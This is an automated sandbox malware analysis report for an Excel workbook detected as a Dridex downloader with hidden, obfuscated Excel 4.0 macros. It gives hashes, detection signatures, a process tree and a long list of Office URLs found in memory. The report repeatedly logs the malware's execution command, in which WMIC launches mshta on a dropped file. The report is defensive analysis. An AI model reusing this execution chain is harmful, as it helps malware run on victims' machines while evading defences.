Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 4310352755503838173672.xlsb

Overview

General Information

Sample Name:4310352755503838173672.xlsb
Analysis ID:532553
MD5:88a363b14590b0c0aab8d954ac3e1b5c
SHA1:af7b370945a8bcec0a979c93ef83770073f2b08a
SHA256:1004873035711456c20f311b16484154554d13e060dd2bbb2c0c2ddd4e73ced4
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Found a hidden Excel 4.0 Macro sheet
Searches for the Microsoft Outlook file path
Yara detected Xls With Macro 4.0
Sigma detected: Suspicious WMI Execution
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6980 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • WMIC.exe (PID: 2588 cmdline: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf" MD5: 79A01FCD1C8166C5642F37D1E0FB7BA8)
      • conhost.exe (PID: 128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mshta.exe (PID: 5244 cmdline: mshta C:\ProgramData\lvDMlIDBF.rtf MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\lvDMlIDBF.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6980, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", ProcessId: 2588
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\SysWOW64\wbem\WMIC.exe, NewProcessName: C:\Windows\SysWOW64\wbem\WMIC.exe, OriginalFileName: C:\Windows\SysWOW64\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 6980, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\lvDMlIDBF.rtf", ProcessId: 2588

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: 4310352755503838173672.xlsbVirustotal: Detection: 39%Perma Link
      Source: 4310352755503838173672.xlsbReversingLabs: Detection: 21%
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe
      Source: EXCEL.EXE, 00000000.00000002.934298714.000000000E028000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
      Source: EXCEL.EXE, 00000000.00000002.934086410.000000000DA70000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/diagram
      Source: EXCEL.EXE, 00000000.00000002.934060152.000000000DA4C000.00000004.00000001.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/drawingml/tableo
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/app/downloadAppInfoQuery15https://api.addins.omex.office
      Source: EXCEL.EXE, 00000000.00000002.934621206.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654254896.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661747538.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660265666.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652940500.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655880436.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652838684.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.851830559.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.778410177.000000000E20D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742911449.000000000E20D000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalledMBI_SSL_SHORT
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedC#
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticatedId8
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/commerce/queryDeepLinkingServicehttps://api.addins.store.of
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
      Source: EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeBearer
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/queryBearer
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api.0/ios9
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechC&
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechbd
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.aadrm.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.aadrm.com/
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://api.aadrm.com/Kq#
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appinfo/queryint
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
      Source: EXCEL.EXE, 00000000.00000003.652673103.000000000E384000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryAppStateQuery15https://api.addins.omex.office.net/appst
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplateD
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://api.cortana.aimt
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.com1az
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comBearer
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comhttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.microsoftstream.com/api/
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickSta
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/nt
      Source: AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.office.net
      Source: EXCEL.EXE, 00000000.00000002.935062360.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660073066.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661378450.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655633741.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653920200.000000000E37B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742257930.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net8
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net?~W
      Source: EXCEL.EXE, 00000000.00000002.937910955.0000000015530000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netYq1
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.onedrive.com
      Source: EXCEL.EXE, 00000000.00000003.652798917.000000000E19D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652985368.000000000E1C0000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comMBI
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/beta/myorg/imports4
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsX
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
      Source: EXCEL.EXE, 00000000.00000003.652906974.000000000E377000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652641725.000000000E377000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsBearer
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsu
      Source: EXCEL.EXE, 00000000.00000003.652755350.000000000E141000.00000004.00000001.sdmp, AACFAEF8-C3FD-4180-B292-8D7DA5E94EC1.0.drString found in binary or memory: https://apis.live.net/v5.0/
      Source: EXCEL.EXE, 00000000.00000003.661389448.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.935100289.000000000E3A0000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.742268683.000000000E392000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.653934403.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.654323256.000000000E3AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.660196369.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.655655152.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.743138102.000000000E39F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.652660540.000000000E3B3000.00000004.00000001.sdmpString found in binary or memory: https://apis.live.net/v5.0/rl
